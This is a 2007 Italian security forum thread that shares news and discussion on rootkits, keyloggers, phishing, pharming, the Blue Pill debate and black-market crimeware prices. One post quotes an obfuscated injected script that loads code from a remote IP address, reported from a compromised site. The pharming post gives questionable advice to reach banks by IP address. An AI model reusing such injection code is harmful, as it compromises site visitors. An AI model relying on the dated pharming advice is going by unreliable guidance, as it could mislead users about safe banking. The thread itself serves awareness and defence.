Torna indietro   Hardware Upgrade Forum > Networking e sicurezza > Antivirus e Sicurezza > Guida all'uso dei Programmi

ASUS ROG Swift OLED PG49WCD: quando QD-OLED e ultrawide si fondono
ASUS ROG Swift OLED PG49WCD: quando QD-OLED e ultrawide si fondono
Da ASUS un monitor particolare ma molto completo: principalmente indirizzato al videogiocatore, può essere sfruttato con efficacia anche per attività creative e di produzione multimediale
Dreame L10s Pro Ultra Heat: la pulizia di casa tutta sostanza
Dreame L10s Pro Ultra Heat: la pulizia di casa tutta sostanza
Il nuovo robot aspirapolvere domestico di Dreame abbina funzionalità complete a un moccio flottante che raggiunge al meglio gli angoli delle pareti. Un prodotto tutto in uno semplice da utilizzare ma molto efficace, in grado di rispondere al meglio alle necessità di pulizia della casa
HONOR Magic6 Pro: come funziona Magic Portal, il modo ''intelligente'' di condividere
HONOR Magic6 Pro: come funziona Magic Portal, il modo ''intelligente'' di condividere
HONOR ha introdotto con Magic6 Pro la funzione Magic Portal che consente, tramite intelligenza artificiale, di suggerire scorciatoie agli utenti in modo da permettere di passare e accedere facilmente ai servizi tra app e dispositivi con un semplice tocco. Vi spieghiamo qui come funziona
Tutti gli articoli Tutte le news

Vai al Forum
Rispondi
 
Strumenti
Old 19-03-2007, 23:27   #81
juninho85
Bannato
 
L'Avatar di juninho85
 
Iscritto dal: Mar 2004
Città: Galapagos Attenzione:utente flautolente,tienilo a mente
Messaggi: 28661
Quote:
Originariamente inviato da giannola Guarda i messaggi
appunto a parte la rom del bios sulla scheda madre e dell'hd (escludendo floppy e chiavette usb), mi specificheresti su quale altro altro supporto hw potrebbe risiedere un virus per sopravvivere allo spegnimento del pc ?
m'hai detto nulla
anche sulle periferiche cd/dvd potrebbe essere fattibile tramite firmware no=?
Quote:
Originariamente inviato da giannola Guarda i messaggi
In ogni caso non ha molto senso che un virus rootkit perda tempo a caricarsi su una memoria volatile di qualche componente se può fungere da macchina virtuale e controllare tutte le funzioni comprese quelle di sicurezza in modo da non essere rilevato.
perchè non dovrebbe aver senso?pensa il disagio che potrebbe provocare a un utente non proprio smanettone che appena vede il proprio computer sfarfallare seriamente,magari per via di qualche paramentro caricato nelle rom che non fa funzionare correttamente il sistema,altro che dialer,trojan ecc ecc
juninho85 è offline   Rispondi citando il messaggio o parte di esso
Old 20-03-2007, 07:55   #82
giannola
Senior Member
 
L'Avatar di giannola
 
Iscritto dal: Oct 2005
Città: Palermo
Messaggi: 2521
Quote:
Originariamente inviato da juninho85 Guarda i messaggi
m'hai detto nulla
anche sulle periferiche cd/dvd potrebbe essere fattibile tramite firmware no=?
certo ho detto nulla.
Ma sull'hd i virus si salvano da un pezzo dunque è una novita.
Sulla rom del bios dubito fortemente si possa installare un virus che contemporaneamente esegua il programma di caricamento originale, non solo per una questione di spazio, ma anche perchè occorrerebbe da parte del pirata scazzarsi tra una marea di specifiche hw.
Mentre ha già soluzioni di uso più rapido.
E per scrivere sui supporti occorre che ci sia prima un disco e che questo sia riscrivibile e vuoto e che sia lasciato sempre nel dispositivo.
Direi che a probabilità il gioco nn vale la candela.

Quote:
Originariamente inviato da juninho85 Guarda i messaggi
perchè non dovrebbe aver senso?pensa il disagio che potrebbe provocare a un utente non proprio smanettone che appena vede il proprio computer sfarfallare seriamente,magari per via di qualche paramentro caricato nelle rom che non fa funzionare correttamente il sistema,altro che dialer,trojan ecc ecc
Per un motivo molto semplice.
Qual'è la priorita di un virus ?
non essere rilevato da alcun sw di sicurezza, proprio questo è quello che tentano di fare i rootkit creando macchine virtuali ad un livello più basso.

Un virus che voglia insediarasi nella ram della scheda video deve prima di tutto risiedere nell'hd, poi deve aver modificato il registro e una serie di voci di servizio per essere caricato all'avvio del sistema operativo ed infine copiare il suo codice nella ram della scheda video.
Però se l'av scopre la sua esistenza lo elimina dall'hd ed anche se non può eliminarlo dalla ram della scheda video sarà sufficiente spegnere il pc per cancellare il contenuto volatile.

Quindi come vedi più che andare a cercare soluzioni astruse e poco efficienti io credo che miglioreranno quelle già in uso.

Ah, ovviamente io do per scontata l'esigenza (di uso comune per i virus moderni) di reperire dati dell'utente in modo discreto (molto remunerativo) piuttosto che combinagli qualche danno come si faceva prima.
__________________
Utente gran figlio di Jobs ed in via di ubuntizzazione
Lippi, perchè non hai convocato loro ?

Ultima modifica di giannola : 20-03-2007 alle 07:57.
giannola è offline   Rispondi citando il messaggio o parte di esso
Old 20-03-2007, 09:11   #83
thebol
Senior Member
 
Iscritto dal: Dec 2000
Città: bologna
Messaggi: 1309
si potrebbe modificare il firmware dell'hd, per rendere magari non scrivibile una porzione di hd. Poi su quella porzione ci potrebbe stare un virus, che venga caricato in memoria dal firmware(non so se sia possibile questa cosa).

secondo me questo tipo di approccio(e in generale quello sui firmware) può essere usato per colpire particolari obbiettivi, ma difficilmente potrà essere usato per virus massivi.
thebol è offline   Rispondi citando il messaggio o parte di esso
Old 20-03-2007, 09:14   #84
juninho85
Bannato
 
L'Avatar di juninho85
 
Iscritto dal: Mar 2004
Città: Galapagos Attenzione:utente flautolente,tienilo a mente
Messaggi: 28661
secondo voi,almeno sulla carta,si tratta di una cosa fattibile oppure è tutta fuffa?
juninho85 è offline   Rispondi citando il messaggio o parte di esso
Old 20-03-2007, 11:27   #85
giannola
Senior Member
 
L'Avatar di giannola
 
Iscritto dal: Oct 2005
Città: Palermo
Messaggi: 2521
Quote:
Originariamente inviato da thebol Guarda i messaggi
si potrebbe modificare il firmware dell'hd, per rendere magari non scrivibile una porzione di hd. Poi su quella porzione ci potrebbe stare un virus, che venga caricato in memoria dal firmware(non so se sia possibile questa cosa).

secondo me questo tipo di approccio(e in generale quello sui firmware) può essere usato per colpire particolari obbiettivi, ma difficilmente potrà essere usato per virus massivi.
infatti.
ma ha poco senso.
Intanto quello che dici (scrittura di una parte del disco e impossibilità di cancellazione) è già in atto per la maggior parte dei virus.
Poi bisogna capire cosa deve fare il virus.
Vuole sballare i settaggi dell'hw fino a danneggiarlo ?
Vuole cancellare il bios ?
Per questo nn ha bisogno di passare dentro la memoria della periferica da colpire, lo può fare restando memorizzato su hd.
Le immagini si possono sballare anche corrompendo le dx nel caso di win.
In ogni caso hai ragione nel dire che è un approccio che non può funzionare per virus di massa e mi stupisce che da megalab arrivino articoli così insensati.

Il problema principale è interfacciarsi con la periferica, dunque occorre un driver.
Ma è impossibile che si possa pensare ad un virus che al suo interno contenga pure i driver per comunicare con tutti i tipi di hw.
Anche ad usare i driver standard si avrebbe il problema che non sono progettati per overcloccare l'hw (con l'intenzione di danneggiarlo) e dunque occorrerebbe modificarli e saremmo al punto di partenza, direi anche peggio perchè a quel punto occorrerebbe non solo conoscere la periferica ma anche la versione del driver che si vuole modificare.

Molto più facile invece controllare il SO che uniformato e servirsi delle sue funzioni per realizzare il controllo sulla macchina, ma questo è quello che fanno già.
__________________
Utente gran figlio di Jobs ed in via di ubuntizzazione
Lippi, perchè non hai convocato loro ?
giannola è offline   Rispondi citando il messaggio o parte di esso
Old 20-03-2007, 11:30   #86
giannola
Senior Member
 
L'Avatar di giannola
 
Iscritto dal: Oct 2005
Città: Palermo
Messaggi: 2521
Quote:
Originariamente inviato da juninho85 Guarda i messaggi
secondo voi,almeno sulla carta,si tratta di una cosa fattibile oppure è tutta fuffa?
ma in teoria lo può fare l'appassionato sul suo pc (che conosce benissimo) a scopo didattico.
Progettare infezioni su larga scala grazie a questi meccanismi mi par inverosimile.

Ricordiamoci sempre che il requisito fondamentale per il virus è la persistenza sulla macchina e questa al momento attuale gliela può fornire solo l'hd.
__________________
Utente gran figlio di Jobs ed in via di ubuntizzazione
Lippi, perchè non hai convocato loro ?
giannola è offline   Rispondi citando il messaggio o parte di esso
Old 20-03-2007, 23:31   #87
Kars
Senior Member
 
L'Avatar di Kars
 
Iscritto dal: Jan 2003
Città: Roma
Messaggi: 2795
Quote:
Originariamente inviato da juninho85 Guarda i messaggi
secondo voi,almeno sulla carta,si tratta di una cosa fattibile oppure è tutta fuffa?
In linea teorica tutto e' possibile, ora non resta che chiedersi come e' che per sentire le piu' disparate teorie alcuni sono disposti a pagare migliaia di euro...
Non si fa' un convegno o una conferenza che sia per discutere su cio' che e' impossibile, sarebbe veramente stupido.
fuffa? non credo proprio. top secret?
puo' darsi.
ciao
Kars è offline   Rispondi citando il messaggio o parte di esso
Old 26-03-2007, 11:58   #88
c.m.g
Senior Member
 
L'Avatar di c.m.g
 
Iscritto dal: Mar 2006
Messaggi: 22109
Russia: al mercato nero i database di importanti istituti di credito. Ma il problema

Russia: al mercato nero i database di importanti istituti di credito. Ma il problema è mondiale.

La notizia arriva dai Kaspersky Lab i quali segnalano come in questo periodo in Russia l’attività del mercato nero sia sotto i riflettori dei media dopo che dati ed informazioni personali di 3 milioni clienti di importanti istituti di credito russi sono finiti nelle mani di venditori senza scrupoli pronti ad offrirli al primo acquirente ad un costo che oscilla tra i 2,000 - 4,000 rubli, (tra i $76 e $150).

Tuttavia non c’è da allarmarsi, infatti, sempre secondo i Kaspersky Lab quella attuale è una normale situazione, visto che il vero allarme è scattato alcune settimane prima quando al mercato nero sono finiti database contenenti informazioni di passaporti di ignari viaggiatori.

Adesso la speranza è che tutto lo scalpore suscitato dai media intorno al fenomeno del “black market” spinga la gente a prestare maggiore attenzione alla sicurezza dei propri dati e apra gli occhi sui sistemi di sicurezza colabrodo degli istituti di credito russi.

Ma il problema non è solo russo, anzi accomuna tutti le nazioni Italia compresa. Nel mese di settembre scorso Anti-Phishing Italia ha condotto un indagine sul fenomeno del mercato nero rilevando la semplicità con la quale chiunque possa averne accesso e la quantità di dati ed informazioni acquistabili o scambiabili...

maggiori info quì:

http://www.anti-phishing.it/news/art...s.13122006.php

da consultare anche l'ottimo blog di mausap:

http://maipiugromozon.blogspot.it
__________________
Questa opera è distribuita secondo le regole di licenza Creative Commons salvo diversa indicazione. Chiunque volesse citare il contenuto di questo post deve necessariamente riportare il link originario.

Ultima modifica di c.m.g : 17-11-2007 alle 11:14.
c.m.g è offline   Rispondi citando il messaggio o parte di esso
Old 29-03-2007, 15:21   #89
c.m.g
Senior Member
 
L'Avatar di c.m.g
 
Iscritto dal: Mar 2006
Messaggi: 22109
altra curiosità pubblicata da viruslist sui keylogger:

Keyloggers: How they work and how to detect them (Part 1)

Nikolay Grebennikov



In February 2005, Joe Lopez, a businessman from Florida, filed a suit against Bank of America after unknown hackers stole $90,000 from his Bank of America account. The money had been transferred to Latvia.

An investigation showed that Mr. Lopez’s computer was infected with a malicious program, Backdoor.Coreflood, which records every keystroke and sends this information to malicious users via the Internet. This is how the hackers got hold of Joe Lopez’s user name and password, since Mr. Lopez often used the Internet to manage his Bank of America account.

However the court did not rule in favor of the plaintiff, saying that Mr. Lopez had neglected to take basic precautions when managing his bank account on the Internet: a signature for the malicious code that was found on his system had been added to nearly all antivirus product databases back in 2003....

continua a questo link:

http://www.viruslist.com/en/analysis?pubid=204791931
__________________
Questa opera è distribuita secondo le regole di licenza Creative Commons salvo diversa indicazione. Chiunque volesse citare il contenuto di questo post deve necessariamente riportare il link originario.
c.m.g è offline   Rispondi citando il messaggio o parte di esso
Old 30-03-2007, 13:31   #90
c.m.g
Senior Member
 
L'Avatar di c.m.g
 
Iscritto dal: Mar 2006
Messaggi: 22109
questa è una mail truffa che mi è arrivata oggi (un tentativo di phishing gratuito):

Accedi e diventa un utente Poste.it verificato
Per poter usufruire dei servizi online di Poste.it occorre prima identificarsi. Inserisci negli appositi spazi il tuo nome utente e la password.


1. Se hai dimenticato la password »

2. Se non sei ancora registrato »
Per usufruire dei servizi online di Poste.it occorre registrarsi.

3. Codice di attivazione
Se ti sei gia registrato e devi inserire il codice di attivazione ricevuto tramite telegramma, inviato da Poste Italiane al tuo domicilio postale, inserisci dapprima il tuo nome utente (del tipo nome.cognome) e la tua password e, successivamente, clicca sul bottone VAI!
A questo punto comparira un apposito modulo nel quale dovrai inserire il numero corrispondente
al tuo codice di attivazione, riportato nel testo del telegramma.

» Informazioni per la sicurezza dei dati

---------------------------------------------------

ma mi hanno preso per uno stupido?

ho deciso di fare una cosa: voglio stare al loro gioco. entrerò nel modulo di verifica dei miei dati e ci metterò dei dati fasulli. come password metterò "ritenta-sarai-più-sfortunato!!!!
__________________
Questa opera è distribuita secondo le regole di licenza Creative Commons salvo diversa indicazione. Chiunque volesse citare il contenuto di questo post deve necessariamente riportare il link originario.

Ultima modifica di c.m.g : 17-11-2007 alle 11:16.
c.m.g è offline   Rispondi citando il messaggio o parte di esso
Old 03-04-2007, 20:40   #91
juninho85
Bannato
 
L'Avatar di juninho85
 
Iscritto dal: Mar 2004
Città: Galapagos Attenzione:utente flautolente,tienilo a mente
Messaggi: 28661
....era ora!

Attuazione del decreto anti bolletta salata


Partito dal 2 Aprile 2007 l´adeguamento alla normativa 660/06/CONS, in pratica il blocco volontario selettivo per alcune numerazioni telefoniche speciali a pagamento sia per i servizi voce che per internet.



Per poter abilitare o inibire l´accesso a tali numeri speciali sarà necessario richiedere un apposito codice identificativo personale (PIN), senza il quale non sarà possibile allacciare collegamenti verso un numero dal prefisso esoso anche se effettuati truffaldinamente da un dialer via internet (se non previo specifico consenso dell´utente, che dovrà eventualmente abilitare l´accesso alla numerazione precedentemente bloccata... Ancora tanti col 56k, neh?).



Utente che, ovviamente, si sarà ricordato di richiedere il PIN e di mantenere inibite le chiamate verso le numerazioni incriminate. Si sarà ricordato, vero? In pratica si va a sostituire la Disabilitazione Permanente Gratuita con una formula più flessibile e personalizzabile. Ma cambia qualcosa...? Non sarebbe stato meglio obbligare gli spacciatori di dialer a dover includere una funzionalità che obbligasse all´inserimento di un PIN per avviare ogni singola connessione, così si avrebbe avuto certezza piena della volontà dell´utente di farsi spillare quattrini?



Richiesta PIN e tutte le informazioni del caso chiamando il 187 di Telecom Italia.







fonte:swzone.it
juninho85 è offline   Rispondi citando il messaggio o parte di esso
Old 05-04-2007, 23:32   #92
juninho85
Bannato
 
L'Avatar di juninho85
 
Iscritto dal: Mar 2004
Città: Galapagos Attenzione:utente flautolente,tienilo a mente
Messaggi: 28661
rilasciata la patch MS riguardo il bug sui cursori animati
juninho85 è offline   Rispondi citando il messaggio o parte di esso
Old 19-06-2007, 21:00   #93
juninho85
Bannato
 
L'Avatar di juninho85
 
Iscritto dal: Mar 2004
Città: Galapagos Attenzione:utente flautolente,tienilo a mente
Messaggi: 28661
Virus: HTML_IFRAME.CU - The Italian Job

Nuovo e potenzialmente pericoloso cavallo di troia in rapida diffusione. HTML_IFRAME.CU, così battezzato da Trend Micro, si è scatenato infettando pare oltre 4.000 siti italiani (molti, sembra, ospitati da un unico provider) di prevalente natura commerciale o dedicati all´intrattenimento e al turismo, ma sembrerebbe possa aver colpito, ad oggi, all´incirca 10.000 siti di svariate nazionalità.



Il JavaScript virale, forzato da abili crackers su server web normalmente al di sopra di ogni sospetto a causa di una falla in Microsoft Internet Information Services, sfrutta alcune differenti vulnerabilità (da tempo risolte) di Internet Explorer per potersi installare nel sistema vittima semplicemente accedendo al sito infetto, creando (secondo il parere di McAfee) la seguente directory in caso di avvenuta infezione:



C:\Sys{4 caratteri a caso}.exe



Una volta insediatosi andrà a scaricare ed installare ulteriori ospiti indesiderati, in modo da poter attivare le procedure per cui è stato concepito: funzionalità di keylogging in grado di intercettare l´immissione via tastiera di password, numeri di carta di credito, dati sensibili.



Si raccomanda di aggionare Internet Explorer specie se azione da tempo non messa in pratica, nonchè di provvedere all´aggiornamento delle definizioni del proprio antivirus.
Ulteriori informazioni:McAfee,,ITPro,Trend Micro
Windows Vista parrebbe essere immune alla minaccia.
juninho85 è offline   Rispondi citando il messaggio o parte di esso
Old 27-06-2007, 16:54   #94
Bugs Bunny
Senior Member
 
L'Avatar di Bugs Bunny
 
Iscritto dal: Aug 2005
Città: Genova
Messaggi: 3391
oggi stavo cercando uno spartito per piano e (guarda a caso) in seconda pagina nei risultati di google mi esce questo bel sito

http://img530.imageshack.us/my.php?i...mmagineky9.gif
che contiene questo script:
<script>document.write('<sc'+'ript src="hxxp://85.255.118.122/cgi-bin/counter?id=76803&ref='+escape(document.referrer)+'"></sc'+'ript>')


85.255.118.122 (stranamente) è di inhoster,ucraina.



inoltre se qualcuno è così furbo da cercare "gooogle" con gogle,si trova l'amato qoogler come secondo risultato,il quale in seconda pagina si alterna con goooble.bz e katasearch

Ultima modifica di Bugs Bunny : 28-06-2007 alle 06:53.
Bugs Bunny è offline   Rispondi citando il messaggio o parte di esso
Old 16-07-2007, 18:43   #95
juninho85
Bannato
 
L'Avatar di juninho85
 
Iscritto dal: Mar 2004
Città: Galapagos Attenzione:utente flautolente,tienilo a mente
Messaggi: 28661
Pharming: attacco alla sicurezza

L´attacco pharming vi prosciuga il conto in banca.



Per primo definiamo questo nuovo e per molti sconosciuto, tipo d´attacco informatico.



Il pharming consiste nella manipolazione degli indirizzi di un server DNS.

In parole povere:
il delinquente di turno realizza una pagina web del tutto uguale alla pagina degli istituti di credito più importanti ma sopratutto clona il codice "ip" e fa reindirizzare nell´atto della digitalizzazione nel nostro browser dell´indirizzo dell´istituto alla pagina clonata, l´utente pensando di essere nel sito voluto prosegue nel suo uso, il malintenzionato carpirà in questo modo le password di accesso, il numero di conto ecc. Una volta carpite, la connessione alla pagina si bloccherà, pensando ad un normale blocco del server o caduta della linea telefonica, si ripeterà il tutto ma questa volta sarete nel sito giusto.


Vi accorgerete della fregatura solo quando vi avranno spogliato dei vostri risparmi.



A differenza del phishing non necessita di inviare malware o trojan con false email ma essendo in rete la falsa pagina, l´utente è convinto di essere al sicuro.



Come difendersi?
conoscere e conservare, ovvio non nel pc, il "numero ip" del proprio istituto di credito.


Come fare per conoscerlo? semplice
andate su start\esegui ( o usando il prompt di dos) digitate ping e l´indirizzo web della vostra banca date invio, vi apparirà una schermata tra cui una serie di numeri come: 193.193.172.215 (digitandolo Vi apparirà il sito di un noto istituto di credito)
In alternativa e per chi sa usarlo, invece di entrare nel prompt di dos, potete avviare un programma ping & tracerout.
Quella serie di numeri è l´indirizzo ip del vostro istituto, d´ora in poi, nel momento in cui avete bisogno di collegarvi alla vostra banca invece di digitare delle lettere inserirete il numero IP che vi è noto.
A mio avviso è sempre consigliabile che Vi accertiate presso la vostra banca, che sia quella la serie di numeri relativa all´istituto stesso.
Perchè? semplice

il ping in questo caso è quello relativo ad una banca in un "group" ovvero quello del sito web generale, spesso per pigrizia noi mettiamo la pagina che ci interessa nei preferiti, relativa a quella che più ci conviene che ha un ip leggermente diverso.



Per adesso gli attacchi sono stati di basso profilo, ma sono in crescita esponenziale.
In questo periodo le società produttrici di antivirus e firewall stanno studiando come evitare tali attacchi.


fonte:swzone.it
juninho85 è offline   Rispondi citando il messaggio o parte di esso
Old 18-08-2007, 09:30   #96
c.m.g
Senior Member
 
L'Avatar di c.m.g
 
Iscritto dal: Mar 2006
Messaggi: 22109
[NEWS] Dibattito: Blue Pill e Malware Virtualizzati

Giorni fa abbiamo parlato del dibattito in corso sulle possibilità di rilevare i malware di nuova generazione basati sulle tecnologie di virtualizzazione. In questi giorni che seguono la conferenza dedicata alla sicurezza Black Hat USA 2007 sono emersi commenti e dettagli su ciò che dobbiamo aspettarci in futuro a questo riguardo, sulla scia dell'attenzione data dai news media al dibattito.

Abbiamo più volte parlato di questo nuovo di tipo di minaccia che si affaccia nel panorama della sicurezza, riportando le notizie su "Blue Pill", un prototipo di rootkit basato su macchina virtuale (sfruttando la tecnologia AMD SVM/Pacifica), sviluppato da [url_=http://theinvisiblethings.blogspot.com/]Joanna Rutkowska[/url], ricercatrice che studia gli stealth malware, e di altri simili codici, come "Vitriol", un rootkit HVM-based che sfrutta l'estensioni di virtualizzazione hardware Intel VT-x, realizzato da Dino Dai Zovi, dirigente dell'azienda di penetration-testing Matasano Security. Come evidenziato nella news precedente, in questi mesi è andato in scena un dibattito tra questi esperti di sicurezza riguardo le possibilità di rilevare questo tipo di malware, spesso definiti come "impossibili da isolare".

Segnaliamo due nuovi interessanti interventi che fanno seguito alle discussioni portate sullo stage del Black Hat USA 200: Rutkowska ha pubblicato un commento sul suo blog InvisibleThings per fare ulteriore chiarezza sulla sua presentazione e Ahmed Sallam, ricercatore di McAfee, ha pubblicato un lungo intervento sul blog ufficiale del McAfee Avert Labs, in cui offre un riassunto dell'intero dibattito e annuncia una metodologia efficace per la rilevazione dei malware VM simili a Blue Pill.

Nel suo blog-post, Rutkowska ha evidenziato le differenze tra il rilevamento di sistemi di virtualizzazione e rilevamento di malware basati sulla virtualizzazione, ribadendo ancora una volta che codice come Blue Pill saranno in futuro sempre più avvantaggiati dalla diffusione stessa delle tecnologie di virtualizzazione. Rutkowska ha tentato di spiegare i motivi per i quali un "blue pill detector", sviluppato come rilevatore generico di virtualizzazione, non può essere considerato uno strumento efficace contro la minaccia di questa nuova famiglia di malware. La ricercatrice ha anche sottolineato le nuove capacità integrate nella nuova versione del suo prototipo Blue Pill (in particolare il supporto per hypervisor annidati) che rendendo questo codice ancora più difficile da rilevare utilizzando strumenti di rilevazione "generica" per hypervisor. Rutkowska commenta: "In altre parole, riteniamo che sarà sempre possibile rilevare la modalità virtualizzata utilizzando vari trucchi e hack, ma 1) questi hack potrebbero dover essere molto complessi 2) nel caso la virtualizzazione sia utilizzato su un computer target per scopi legittimi tutti questi metodi fallirebbero in ogni caso". Ricordiamo inoltre che il codice sorgente di "Blue Pill" è stato reso disponibile pubblicamente dalla ricercatrice su bluepillproject.org.

Di contro Sallam di McAfee, che ha pubblicato il suo blog-post pochi giorni fa, ritiene che gli sforzi volti alla creazione di un "Blue Pill impossibile da rilevare" siano alquanto inutili. A supporto di questa sensazione Sallam cita i progressi in atto nella sicurezza dei sistemi di virtualizzazione, con sistemi di autenticazione per gli hypervisor commerciali, eventualmente a livello "firmware". Sallam descrive anche una metodologia, a suo avviso sempre efficace per il rilevamento di hypervisor "indesiderati" in un sistema. Questo metodo si basa su quella che il ricercatore definisce un'altra importante falla nell'attuale architettura dei processori, ossia l'uso dei TLBs (Translation Lookaside buffers) per la cache del mapping da indirizzi virtuali a indirizzi fisici, che viene salvato nelle PTE (Page Table Entries). Si tratta di una metodologia simile a quella descritta dalla stessa Rutkowska durante la sua presentazione "IsGameOver(), anyone?", ma che la ricercatrice aveva definito come "non efficace".

Invitiamo tutti coloro che sono interessati a comprendere meglio la problematica qui discussa a leggere i due blog-post dei ricercatori, che includono dettagli tecnici su ciascun "punto di vista". Il fatto certo è che il dibattito sulle possibilità di rilevare codici malware basati su macchina virtuale continua a impegnare gli esperti di sicurezza e sicuramente in futuro emergeranno molte novità a proposito, in particolare quando questo tipo di attacchi debutteranno in-the-wild sulla scena del cyber-crime e quando i vendor antivirus si troveranno a dover fornire le prime soluzioni pratiche per il loro rilevamento.

Fonte: Tweakness

Ultima modifica di c.m.g : 18-08-2007 alle 09:35.
c.m.g è offline   Rispondi citando il messaggio o parte di esso
Old 29-08-2007, 10:02   #97
c.m.g
Senior Member
 
L'Avatar di c.m.g
 
Iscritto dal: Mar 2006
Messaggi: 22109
[NEWS] Cybercrime? Il crimeware costa poco

News del 29/08/2007

Milano - Spyware, malware, crimeware: i tool di attacco destinati a colpire gli utenti meno attenti, in particolare quelli che usano un sistema Windows non adeguatamente protetto, non fanno che aumentare e ciò si deve anche alla forte richiesta di questi strumenti sul mercato nero. Ci torna su in queste ore Panda Software, secondo cui basta investire 1.200 dollari per acquisire ciò che serve per entrare nella schiera dei cybercriminali.

Con una ricognizione nelle chat, forum e negli altri ambienti nei quali si muovono i protagonisti del mercato nero dei tool di attacco informatico, gli esperti della società di sicurezza hanno accertato quanto molti codici particolarmente insidiosi siano venduti a poche lire, con gran profitto per chi li produce e li diffonde. A detta dei labs di Panda, il fenomeno della compravendita illegale si svolge in particolare in spazi web ospitati su server dell'Europa orientale ma - avvertono gli esperti - "la mafia di Internet sta allargando le proprie maglie in tutto il mondo".

"Se un cyber criminale volesse comprare un Trojan - spiega Panda - dovrà solo pagare una cifra che oscilla tra i 350 e i 700 dollari. Un codice simile, ma in grado di recuperare password, ne costa 600 ed un Limbo Trojan, con funzionalità inferiori, ha un prezzo pari a 500 dollari, anche se spesso è venduto a 350. Entrambi gli esemplari rubano password per accedere a servizi bancari online. I cyber criminali devono versare una somma di 500 dollari per ottenere un Trojan che registri i numeri di conto dei servizi di pagamento, come Webmoney, ma spesso ci sono delle 'offerte specialì. In un caso, i primi 100 acquirenti l'hanno pagato solo 400 dollari".

Promozioni e sconti quantità, dunque, per un servizio completo che include non solo il codice di attacco ma anche liste di indirizzi email da colpire. In questo caso, spiegano gli esperti di Panda, "i prezzi variano dai 100 dollari per un milione di indirizzi a 1.500 per 32 milioni. Qualora si desiderasse inviare anche link che scaricano il Trojan agli utenti di instant messaging, si potrà comprare un milione di indirizzi ICQ con 150 dollari".

Ma non è finita: viene venduto anche il mascheramento antivirus. Per evitare che il proprio codice sia individuato dai software di protezione più diffusi, si possono spendere ulteriori dollari per la difesa del malware. In più, sottolinea Panda, "se si desiderasse proteggere il proprio codice in maniera indipendente, con 20 dollari si può acquistare un software di crittografia polimorfica, chiamato Polaris".

I meno attrezzati tra i delinquenti wannabe possono anche affittare un server sparaspam per 500 dollari. "A quel punto - spiega Panda - i cyber criminali non dovranno far altro che attendere i risultati del proprio attacco".

I calcoli sono dunque semplici: se un Trojan costa 500 dollari ed un milione di indirizzi di posta elettronica circa 100, significa che 600 dollari sono sufficienti per tentare di colpire un milione di persone. Con Trojan ed altro malware possono entrare in possesso di dati sensibili, per esempio di accesso a conti bancari online: avendone a disposizione moltissimi, certi cybercriminali possono prelevare qua e là piccole somme, evitando così di essere individuati.

Fonte: Punto Informatico

Ultima modifica di c.m.g : 29-08-2007 alle 10:19.
c.m.g è offline   Rispondi citando il messaggio o parte di esso
Old 29-08-2007, 10:18   #98
c.m.g
Senior Member
 
L'Avatar di c.m.g
 
Iscritto dal: Mar 2006
Messaggi: 22109
[NEWS] Il crack dei filtri imbarazza l'Australia

News del 28/08/2007

Roma - Australia, terra di hacker e di lotta alla pornografia online. Sono bastati trenta minuti a Tom Wood, sedici anni, per crackare il filtro per la pornografia distribuito dal Governo australiano a tutte le famiglie e costato l'equivalente di quasi [b]43 milioni di euro[/url].

Secondo il giovane Tom, il software statunitense Safe Eyes scelto dal Governo australiano "è un [b]orribile spreco di denaro[/url]". "L'ho scaricato per vedere quanto fosse buono - racconta - perché per tutti quei soldi [b]mi sarei aspettato un filtro quasi indistruttibile[/url]: ho provato un paio di cose, e ci è voluta circa mezz'ora per renderlo totalmente inservibile". Il metodo utilizzato non elimina il software dal computer, ma si limita a renderlo inoffensivo e, beffa oltre al danno, apparentemente funzionante.

Nel frattempo il governo tenta di difendere il sistema, annunciando di aver previsto questa eventualità e di aver già richiesto un aggiornamento al produttore. Anche un nuovo software denominato Integard è comparso online sulle pagine del programma ministeriale: questa volta a Tom sono serviti quaranta minuti per scavalcarne le difese.

Il ragazzo, che vive a Melbourne ed è un liceale modello, ha scelto di rendere pubblico il suo exploit per evitare che qualcun altro scoprisse il trucchetto e lo diffondesse. Le sue intenzioni sono sincere, sostiene, poiché a suo dire "filtrare la pornografia può servire" ma soprattutto è necessario "collaborare coi ragazzi, perché il problema che abbiamo riguarda direttamente i ragazzi, non gli adulti".

L'occasione era troppo ghiotta perché i promotori della [b]crociata antipornografia[/url] non si facessero avanti. È il caso di Steve Fielding, senatore e da molto tempo tra i protagonisti della campagna per la cyber-sicurezza, che ribadisce la necessità di integrare dei filtri anche sugli apparati dei provider: "C'è bisogno di entrambi (i filtri, ndr), a livello di ISP e a livello di PC. Il Governo non ha avuto buon senso e ha esposto i ragazzi al pericolo". Di tutt'altro avviso la blogosfera, che plaude a Tom e alla sua vena hacker e ribadisce l'importanza del controllo diretto dei genitori, senza delegarlo ad un software qualunque, e del dialogo.

Fonte: Punto Informatico
c.m.g è offline   Rispondi citando il messaggio o parte di esso
Old 03-09-2007, 15:12   #99
c.m.g
Senior Member
 
L'Avatar di c.m.g
 
Iscritto dal: Mar 2006
Messaggi: 22109
[NEWS] Germania, trojan di stato contro il terrorismo

Notizia del 03/09/2007

Berlino - Occultati fra gli allegati di innocue email provenienti dalle agenzie governative, dei trojan di stato potrebbero monitorare gli hard disk e la vita online di presuntiterroristi, riempiendo i server della polizia di informazioni preziose. È un documento trapelato presso la stampa tedesca, un "canovaccio" tecnico sulla questione, a svelare il contenuto della proposta che il ministro degli interni Wolfgang Schauble (vedi foto in basso) tenterà di includere in una più ampia legge a tutela della sicurezza nazionale.



Ironia della sorte, la proposta di legge che sembrerebbe legittimare il cracking di stato giunge in seguito al recente attacco subito dal governo tedesco a mezzo trojan di presunta origine cinese, e in seguito alla discussa legge 202C, che prevede l'inasprimento delle pene per hacker e smanettoni. E si pone come "naturale conseguenza" del veto nel quale era incorso l'analogo provvedimento adottato dal lander del Nord-Reno Westfalia. Le indagini da remoto a mezzo software erano state bandite nel dicembre scorso dall'Alta Corte tedesca perché non assimilabili né alla normativa che regola le intercettazioni, né a quella che regola le perquisizioni domiciliari. Ed ecco che il ministero ha tentato di sopperire al vuoto legislativo, al fine di supportare l'introduzione dell'indagine a mezzo "software per l'investigazione forense", paragonato da Schauble all'americano CIPAV.

La misura sembra incontrare l'approvazione del cancelliere Merkel, che attraverso un suo portavoce, riporta AP, ha dichiarato di condividere la proposta, che dovrà però passare per le forche caudine del dibattito fra i ministri, la coalizione governativa e gli esperti in materia.

